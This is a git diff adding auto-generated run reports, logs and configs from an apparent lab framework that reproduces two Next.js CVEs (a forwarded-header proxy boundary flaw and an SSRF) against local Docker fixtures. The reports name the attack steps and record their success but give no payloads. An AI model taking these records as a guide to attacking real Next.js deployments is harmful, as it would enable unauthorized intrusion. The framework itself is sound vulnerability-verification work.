diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/report.md b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/report.md
new file mode 100644
index 00000000..4ee0845a
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/report.md
@@ -0,0 +1,86 @@
+# 运行 nextjs-nextjs--CVE-2020-15242-20260318012830
+
+> `LAB ONLY` | `AUTHORIZED TARGETS ONLY` | 自动生成 run bundle
+
+- 漏洞条目: `nextjs--CVE-2020-15242`
+- 系统: `nextjs`
+- Repro Profile: `nextjs-proxy-boundary`
+- 实证状态: `verified-real`
+- 实证方式: `real`
+- Artifact 模式: `local-fixture`
+- 启动时间: `2026-03-18T01:28:30+00:00`
+- 完成时间: `2026-03-18T01:28:37+00:00`
+- 阻塞原因: `-`
+- Compose 服务: `app`
+
+## 运行时间线
+
+- Mermaid: [timeline.mmd](/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/timeline.mmd)
+
+| 时间 | 步骤 | 状态 | 说明 |
+|------|------|------|------|
+| `2026-03-18T01:28:30+00:00` | `select-advisory` | `completed` | nextjs--CVE-2020-15242 |
+| `2026-03-18T01:28:30+00:00` | `resolve-repro-profile` | `completed` | nextjs-proxy-boundary |
+| `2026-03-18T01:28:31+00:00` | `doctor` | `completed` | all checks passed |
+| `2026-03-18T01:28:34+00:00` | `provision-compose-environment` | `ready` | - |
+| `2026-03-18T01:28:34+00:00` | `wait-ready` | `completed` | baseline urls ready (1) |
+| `2026-03-18T01:28:34+00:00` | `seed-environment` | `completed` | steps=1 |
+| `2026-03-18T01:28:34+00:00` | `baseline-snapshot` | `completed` | urls=1 |
+| `2026-03-18T01:28:34+00:00` | `browser-replay-before-attack` | `completed` | - |
+| `2026-03-18T01:28:34+00:00` | `controlled-attack-chain` | `completed` | steps=1 |
+| `2026-03-18T01:28:35+00:00` | `browser-replay-after-attack` | `completed` | - |
+| `2026-03-18T01:28:35+00:00` | `collect-logs-and-evidence` | `completed` | container_logs=1 |
+| `2026-03-18T01:28:37+00:00` | `cleanup-compose-environment` | `completed` | docker compose down completed |
+| `2026-03-18T01:28:37+00:00` | `update-registry-and-reports` | `completed` | nextjs-nextjs--CVE-2020-15242-20260318012830 |
+
+## Compose 拓扑
+
+- Compose 文件: `/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/compose/compose.yaml`
+- 服务列表: `app`
+
+## 攻击步骤
+
+| 工具/步骤 | 状态 | 结果 |
+|-----------|------|------|
+| `nextjs.proxy-boundary` | `completed` | `/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/attack.json` |
+
+## 证据摘要
+
+- Baseline: `1`
+- 攻击步骤: `1`
+- 浏览器证据: `10`
+- 容器日志: `1`
+- 请求日志: `2`
+
+## 浏览器截图
+
+![baseline](assets/baseline.png)
+![proof](assets/proof.png)
+
+## 浏览器证据
+
+- `assets/baseline.png`
+- `assets/baseline-dom.html`
+- `logs/baseline-console.json`
+- `logs/baseline-network.json`
+- `logs/baseline-page.json`
+- `assets/proof.png`
+- `assets/proof-dom.html`
+- `logs/proof-console.json`
+- `logs/proof-network.json`
+- `logs/proof-page.json`
+
+## 容器日志
+
+- `logs/docker/app.log`
+
+## 请求与基线日志
+
+- `logs/attack.json`
+- `logs/baseline.json`
+
+## 最小化验证说明
+
+- 仅限自有资产、本地靶场或已授权实验目标。
+- 默认执行 minimal-proof；不会把破坏性或不可回滚动作作为默认路径。
+- 若浏览器证据缺失，前端类案例不会被标为 `verified-*`。
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/run.json b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/run.json
new file mode 100644
index 00000000..1772d035
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/run.json
@@ -0,0 +1,197 @@
+{
+  "run_id": "nextjs-nextjs--CVE-2020-15242-20260318012830",
+  "system_id": "nextjs",
+  "advisory_id": "nextjs--CVE-2020-15242",
+  "repro_profile_id": "nextjs-proxy-boundary",
+  "verification_status": "verified-real",
+  "verification_mode": "real",
+  "artifact_mode": "local-fixture",
+  "target_env": "local-docker",
+  "compose_services": [
+    "app"
+  ],
+  "baseline_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline.json"
+  ],
+  "attack_steps": [
+    {
+      "kind": "runner",
+      "tool": "nextjs.proxy-boundary",
+      "status": "completed",
+      "status_code": 200,
+      "result_path": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/attack.json"
+    }
+  ],
+  "browser_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-page.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-page.json"
+  ],
+  "browser_evidence": {
+    "required": true,
+    "present": true,
+    "refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-page.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-page.json"
+    ],
+    "baseline_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-page.json"
+    ],
+    "proof_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-page.json"
+    ],
+    "baseline_title": "Next.js Proxy Boundary Fixture",
+    "proof_title": "Next.js Proxy Boundary Fixture - proof",
+    "error_kind": null,
+    "reason": null
+  },
+  "container_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/docker/app.log"
+  ],
+  "request_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/attack.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline.json"
+  ],
+  "compose_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/compose/compose.yaml"
+  ],
+  "timeline": [
+    {
+      "at": "2026-03-18T01:28:30+00:00",
+      "step": "select-advisory",
+      "status": "completed",
+      "detail": "nextjs--CVE-2020-15242"
+    },
+    {
+      "at": "2026-03-18T01:28:30+00:00",
+      "step": "resolve-repro-profile",
+      "status": "completed",
+      "detail": "nextjs-proxy-boundary"
+    },
+    {
+      "at": "2026-03-18T01:28:31+00:00",
+      "step": "doctor",
+      "status": "completed",
+      "detail": "all checks passed"
+    },
+    {
+      "at": "2026-03-18T01:28:34+00:00",
+      "step": "provision-compose-environment",
+      "status": "ready",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:28:34+00:00",
+      "step": "wait-ready",
+      "status": "completed",
+      "detail": "baseline urls ready (1)"
+    },
+    {
+      "at": "2026-03-18T01:28:34+00:00",
+      "step": "seed-environment",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:28:34+00:00",
+      "step": "baseline-snapshot",
+      "status": "completed",
+      "detail": "urls=1"
+    },
+    {
+      "at": "2026-03-18T01:28:34+00:00",
+      "step": "browser-replay-before-attack",
+      "status": "completed",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:28:34+00:00",
+      "step": "controlled-attack-chain",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:28:35+00:00",
+      "step": "browser-replay-after-attack",
+      "status": "completed",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:28:35+00:00",
+      "step": "collect-logs-and-evidence",
+      "status": "completed",
+      "detail": "container_logs=1"
+    },
+    {
+      "at": "2026-03-18T01:28:37+00:00",
+      "step": "cleanup-compose-environment",
+      "status": "completed",
+      "detail": "docker compose down completed"
+    },
+    {
+      "at": "2026-03-18T01:28:37+00:00",
+      "step": "update-registry-and-reports",
+      "status": "completed",
+      "detail": "nextjs-nextjs--CVE-2020-15242-20260318012830"
+    }
+  ],
+  "success_evaluation": {
+    "passed": true,
+    "verification_status": "verified-real",
+    "blocked_reason": null,
+    "assertions": [
+      {
+        "name": "baseline-ok",
+        "kind": "baseline-ok",
+        "passed": true,
+        "detail": "baseline URLs responded without 5xx or transport errors"
+      },
+      {
+        "name": "runner-success",
+        "kind": "runner-success",
+        "passed": true,
+        "detail": "trusted forwarded headers crossed the boundary"
+      },
+      {
+        "name": "browser-present",
+        "kind": "browser-present",
+        "passed": true,
+        "detail": "browser evidence captured"
+      }
+    ]
+  },
+  "historical_status": "verified-real",
+  "latest_status": "verified-real",
+  "started_at": "2026-03-18T01:28:30+00:00",
+  "finished_at": "2026-03-18T01:28:37+00:00",
+  "blocked_reason": null,
+  "report_refs": {
+    "bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830",
+    "report_md": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/report.md",
+    "report_html": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/report.html",
+    "timeline": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/timeline.mmd"
+  }
+}
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/timeline.mmd b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/timeline.mmd
new file mode 100644
index 00000000..71155437
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/timeline.mmd
@@ -0,0 +1,8 @@
+flowchart LR
+A["选择 Advisory"] --> B["解析 Repro Profile"]
+B --> C["生成 Compose 环境"]
+C --> D["采集基线快照"]
+D --> E["执行受控攻击步骤"]
+E --> F["浏览器回放验证"]
+F --> G["收集日志与证据"]
+G --> H["回写 Registry 与报告"]
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/compose/compose.yaml b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/compose/compose.yaml
new file mode 100644
index 00000000..193d95e3
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/compose/compose.yaml
@@ -0,0 +1,26 @@
+services:
+  app:
+    image: node:22-alpine
+    networks:
+    - labnet
+    ports:
+    - 18203:3000
+    environment:
+      LAB_FIXTURE_SCENARIO: /workspace/00-environments/templates/fixtures/nextjs/ssrf/scenario.json
+      PORT: '3000'
+    command:
+    - node
+    - /workspace/00-environments/templates/fixtures/shared/node_fixture.mjs
+    working_dir: /workspace
+    volumes:
+    - /Users/x/websafe:/workspace:ro
+    healthcheck:
+      test:
+      - CMD-SHELL
+      - wget -q -O - http://127.0.0.1:3000/healthz >/dev/null 2>&1 || exit 1
+      interval: 2s
+      timeout: 2s
+      retries: 20
+networks:
+  labnet:
+    driver: bridge
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/attack.json b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/attack.json
new file mode 100644
index 00000000..c12b5b47
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/attack.json
@@ -0,0 +1,57 @@
+{
+  "steps": [
+    {
+      "kind": "runner",
+      "tool": "nextjs.ssrf",
+      "status": "completed",
+      "status_code": 200,
+      "result_path": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/attack.json"
+    }
+  ],
+  "success": true,
+  "detail": "server-side callback reached the local sink",
+  "before": {},
+  "attack": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "ok": true,
+      "detail": "server-side callback reached the local sink",
+      "case_id": "nextjs--CVE-2024-34351"
+    }
+  },
+  "after": {},
+  "proof": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "success": true,
+      "detail": "server-side callback reached the local sink",
+      "case_id": "nextjs--CVE-2024-34351",
+      "sink_hits": 1,
+      "uploads": [],
+      "events": [
+        {
+          "event": "seed",
+          "detail": "nextjs--CVE-2024-34351"
+        },
+        {
+          "event": "sink-hit",
+          "detail": "case_id=nextjs--CVE-2024-34351"
+        },
+        {
+          "event": "attack",
+          "detail": "server-side callback reached the local sink"
+        }
+      ]
+    }
+  },
+  "assertions": [
+    {
+      "name": "proof-success",
+      "kind": "runner-proof",
+      "passed": true,
+      "detail": "server-side callback reached the local sink"
+    }
+  ]
+}
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/baseline.json b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/baseline.json
new file mode 100644
index 00000000..e55c4159
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/baseline.json
@@ -0,0 +1,25 @@
+{
+  "observations": [
+    {
+      "url": "http://127.0.0.1:18203/",
+      "status_code": 200,
+      "headers": {
+        "content-type": "text/html; charset=utf-8",
+        "content-length": "990",
+        "Date": "Wed, 18 Mar 2026 01:29:56 GMT",
+        "Connection": "keep-alive",
+        "Keep-Alive": "timeout=5"
+      },
+      "body_excerpt": "<!doctype html>\n<html lang=\"zh-CN\">\n<head>\n  <meta charset=\"utf-8\">\n  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n  <title>Next.js SSRF Fixture</title>\n  <style>\n    body { font-family: sans-serif; background: #0f172a; color: #e2e8f0; margin: 0; padding: 32px; }\n    main { max-width: 900px; margin: 0 auto; background: #111827; border: 1px solid #334155; border-radius: 16px"
+    }
+  ],
+  "steps": [
+    {
+      "kind": "http-get",
+      "status": "completed",
+      "path": "/",
+      "status_code": 200,
+      "body_excerpt": "<!doctype html>\n<html lang=\"zh-CN\">\n<head>\n  <meta charset=\"utf-8\">\n  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n  <title>Next.js SSRF Fixture</title>\n  <style>\n    body { fo"
+    }
+  ]
+}
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/docker/app.log b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/docker/app.log
new file mode 100644
index 00000000..e69de29b
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/doctor.json b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/doctor.json
new file mode 100644
index 00000000..6847afed
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/doctor.json
@@ -0,0 +1,44 @@
+{
+  "status": "passed",
+  "ok": true,
+  "checks": [
+    {
+      "name": "docker-cli",
+      "ok": true,
+      "detail": "docker CLI available"
+    },
+    {
+      "name": "docker-daemon",
+      "ok": true,
+      "detail": "context=desktop-linux"
+    },
+    {
+      "name": "playwright-import",
+      "ok": true,
+      "detail": "playwright Python package import passed"
+    },
+    {
+      "name": "playwright-browser",
+      "ok": true,
+      "detail": "chromium runtime launch passed"
+    },
+    {
+      "name": "ports",
+      "ok": true,
+      "detail": "checked 1 host port bindings",
+      "bindings": [
+        {
+          "profile_id": "nextjs-ssrf",
+          "service": "app",
+          "binding": "18203:3000",
+          "port": 18203
+        }
+      ]
+    }
+  ],
+  "profile_ids": [
+    "nextjs-ssrf"
+  ],
+  "failure_count": 0,
+  "summary": "all checks passed"
+}
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/ready.json b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/ready.json
new file mode 100644
index 00000000..16c8fd5f
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/ready.json
@@ -0,0 +1,12 @@
+{
+  "status": "completed",
+  "detail": "baseline urls ready (1)",
+  "elapsed_seconds": 0.0,
+  "observations": [
+    {
+      "url": "http://127.0.0.1:18203/",
+      "status_code": 200
+    }
+  ],
+  "compose_path": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/compose/compose.yaml"
+}
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/seed.json b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/seed.json
new file mode 100644
index 00000000..b4a80285
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/seed.json
@@ -0,0 +1,21 @@
+{
+  "steps": [
+    {
+      "kind": "runner",
+      "tool": "nextjs.ssrf",
+      "status": "completed",
+      "status_code": 200,
+      "detail": "fixture seeded"
+    }
+  ],
+  "seeded": true,
+  "result": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "ok": true,
+      "detail": "fixture seeded",
+      "case_id": "nextjs--CVE-2024-34351"
+    }
+  }
+}
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/report.html b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/report.html
new file mode 100644
index 00000000..c25eb99f
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/report.html
@@ -0,0 +1,45 @@
+<!doctype html>
+<html><head><meta charset='utf-8'><title>websafe 运行报告</title>
+<style>body{font-family:ui-sans-serif,system-ui,sans-serif;margin:2rem;line-height:1.55;background:#f8fafc;color:#0f172a;} code,pre{background:#e2e8f0;padding:.2rem .4rem;border-radius:.3rem;} pre{white-space:pre-wrap;} .grid{display:grid;grid-template-columns:repeat(2,minmax(0,1fr));gap:1rem;} .card{border:1px solid #cbd5e1;padding:1rem;border-radius:.75rem;background:#fff;} table{width:100%;border-collapse:collapse;background:#fff;border:1px solid #cbd5e1;border-radius:.75rem;overflow:hidden;} th,td{padding:.75rem;border-bottom:1px solid #e2e8f0;text-align:left;vertical-align:top;} img{max-width:100%;border:1px solid #cbd5e1;border-radius:.5rem;} .gallery{display:grid;grid-template-columns:repeat(auto-fit,minmax(320px,1fr));gap:1rem;}</style>
+</head><body>
+<h1>运行 nextjs-nextjs--CVE-2024-34351-20260318012953</h1>
+<div class='grid'>
+<div class='card'><strong>漏洞条目</strong><br><code>nextjs--CVE-2024-34351</code></div>
+<div class='card'><strong>实证状态</strong><br><code>verified-real</code></div>
+<div class='card'><strong>复现 Profile</strong><br><code>nextjs-ssrf</code></div>
+<div class='card'><strong>Artifact 模式</strong><br><code>local-fixture</code></div>
+</div>
+<h2>Mermaid 时间线</h2>
+<pre>flowchart LR
+A[&quot;选择 Advisory&quot;] --&gt; B[&quot;解析 Repro Profile&quot;]
+B --&gt; C[&quot;生成 Compose 环境&quot;]
+C --&gt; D[&quot;采集基线快照&quot;]
+D --&gt; E[&quot;执行受控攻击步骤&quot;]
+E --&gt; F[&quot;浏览器回放验证&quot;]
+F --&gt; G[&quot;收集日志与证据&quot;]
+G --&gt; H[&quot;回写 Registry 与报告&quot;]</pre>
+<h2>运行时间线</h2>
+<table><thead><tr><th>时间</th><th>步骤</th><th>状态</th><th>说明</th></tr></thead><tbody>
+<tr><td><code>2026-03-18T01:29:53+00:00</code></td><td><code>select-advisory</code></td><td><code>completed</code></td><td>nextjs--CVE-2024-34351</td></tr>
+<tr><td><code>2026-03-18T01:29:53+00:00</code></td><td><code>resolve-repro-profile</code></td><td><code>completed</code></td><td>nextjs-ssrf</td></tr>
+<tr><td><code>2026-03-18T01:29:53+00:00</code></td><td><code>doctor</code></td><td><code>completed</code></td><td>all checks passed</td></tr>
+<tr><td><code>2026-03-18T01:29:56+00:00</code></td><td><code>provision-compose-environment</code></td><td><code>ready</code></td><td>-</td></tr>
+<tr><td><code>2026-03-18T01:29:56+00:00</code></td><td><code>wait-ready</code></td><td><code>completed</code></td><td>baseline urls ready (1)</td></tr>
+<tr><td><code>2026-03-18T01:29:56+00:00</code></td><td><code>seed-environment</code></td><td><code>completed</code></td><td>steps=1</td></tr>
+<tr><td><code>2026-03-18T01:29:56+00:00</code></td><td><code>baseline-snapshot</code></td><td><code>completed</code></td><td>urls=1</td></tr>
+<tr><td><code>2026-03-18T01:29:56+00:00</code></td><td><code>controlled-attack-chain</code></td><td><code>completed</code></td><td>steps=1</td></tr>
+<tr><td><code>2026-03-18T01:29:56+00:00</code></td><td><code>collect-logs-and-evidence</code></td><td><code>completed</code></td><td>container_logs=1</td></tr>
+<tr><td><code>2026-03-18T01:29:57+00:00</code></td><td><code>cleanup-compose-environment</code></td><td><code>completed</code></td><td>docker compose down completed</td></tr>
+<tr><td><code>2026-03-18T01:29:57+00:00</code></td><td><code>update-registry-and-reports</code></td><td><code>completed</code></td><td>nextjs-nextjs--CVE-2024-34351-20260318012953</td></tr>
+</tbody></table>
+<h2>攻击步骤</h2>
+<table><thead><tr><th>工具</th><th>状态</th><th>输出</th></tr></thead><tbody>
+<tr><td><code>nextjs.ssrf</code></td><td><code>completed</code></td><td><code>/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/attack.json</code></td></tr>
+</tbody></table>
+<h2>证据清单</h2><ul>
+<li><code>compose/compose.yaml</code></li>
+<li><code>logs/docker/app.log</code></li>
+<li><code>logs/attack.json</code></li>
+<li><code>logs/baseline.json</code></li>
+</ul>
+</body></html>
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/report.md b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/report.md
new file mode 100644
index 00000000..72037d01
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/report.md
@@ -0,0 +1,66 @@
+# 运行 nextjs-nextjs--CVE-2024-34351-20260318012953
+
+> `LAB ONLY` | `AUTHORIZED TARGETS ONLY` | 自动生成 run bundle
+
+- 漏洞条目: `nextjs--CVE-2024-34351`
+- 系统: `nextjs`
+- Repro Profile: `nextjs-ssrf`
+- 实证状态: `verified-real`
+- 实证方式: `real`
+- Artifact 模式: `local-fixture`
+- 启动时间: `2026-03-18T01:29:53+00:00`
+- 完成时间: `2026-03-18T01:29:57+00:00`
+- 阻塞原因: `-`
+- Compose 服务: `app`
+
+## 运行时间线
+
+- Mermaid: [timeline.mmd](/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/timeline.mmd)
+
+| 时间 | 步骤 | 状态 | 说明 |
+|------|------|------|------|
+| `2026-03-18T01:29:53+00:00` | `select-advisory` | `completed` | nextjs--CVE-2024-34351 |
+| `2026-03-18T01:29:53+00:00` | `resolve-repro-profile` | `completed` | nextjs-ssrf |
+| `2026-03-18T01:29:53+00:00` | `doctor` | `completed` | all checks passed |
+| `2026-03-18T01:29:56+00:00` | `provision-compose-environment` | `ready` | - |
+| `2026-03-18T01:29:56+00:00` | `wait-ready` | `completed` | baseline urls ready (1) |
+| `2026-03-18T01:29:56+00:00` | `seed-environment` | `completed` | steps=1 |
+| `2026-03-18T01:29:56+00:00` | `baseline-snapshot` | `completed` | urls=1 |
+| `2026-03-18T01:29:56+00:00` | `controlled-attack-chain` | `completed` | steps=1 |
+| `2026-03-18T01:29:56+00:00` | `collect-logs-and-evidence` | `completed` | container_logs=1 |
+| `2026-03-18T01:29:57+00:00` | `cleanup-compose-environment` | `completed` | docker compose down completed |
+| `2026-03-18T01:29:57+00:00` | `update-registry-and-reports` | `completed` | nextjs-nextjs--CVE-2024-34351-20260318012953 |
+
+## Compose 拓扑
+
+- Compose 文件: `/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/compose/compose.yaml`
+- 服务列表: `app`
+
+## 攻击步骤
+
+| 工具/步骤 | 状态 | 结果 |
+|-----------|------|------|
+| `nextjs.ssrf` | `completed` | `/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/attack.json` |
+
+## 证据摘要
+
+- Baseline: `1`
+- 攻击步骤: `1`
+- 浏览器证据: `0`
+- 容器日志: `1`
+- 请求日志: `2`
+
+## 容器日志
+
+- `logs/docker/app.log`
+
+## 请求与基线日志
+
+- `logs/attack.json`
+- `logs/baseline.json`
+
+## 最小化验证说明
+
+- 仅限自有资产、本地靶场或已授权实验目标。
+- 默认执行 minimal-proof；不会把破坏性或不可回滚动作作为默认路径。
+- 若浏览器证据缺失，前端类案例不会被标为 `verified-*`。
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/run.json b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/run.json
new file mode 100644
index 00000000..aa0cf021
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/run.json
@@ -0,0 +1,145 @@
+{
+  "run_id": "nextjs-nextjs--CVE-2024-34351-20260318012953",
+  "system_id": "nextjs",
+  "advisory_id": "nextjs--CVE-2024-34351",
+  "repro_profile_id": "nextjs-ssrf",
+  "verification_status": "verified-real",
+  "verification_mode": "real",
+  "artifact_mode": "local-fixture",
+  "target_env": "local-docker",
+  "compose_services": [
+    "app"
+  ],
+  "baseline_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/baseline.json"
+  ],
+  "attack_steps": [
+    {
+      "kind": "runner",
+      "tool": "nextjs.ssrf",
+      "status": "completed",
+      "status_code": 200,
+      "result_path": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/attack.json"
+    }
+  ],
+  "browser_refs": [],
+  "browser_evidence": {
+    "required": false,
+    "present": false,
+    "refs": [],
+    "baseline_refs": [],
+    "proof_refs": [],
+    "baseline_title": null,
+    "proof_title": null,
+    "error_kind": null,
+    "reason": null
+  },
+  "container_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/docker/app.log"
+  ],
+  "request_log_refs": [
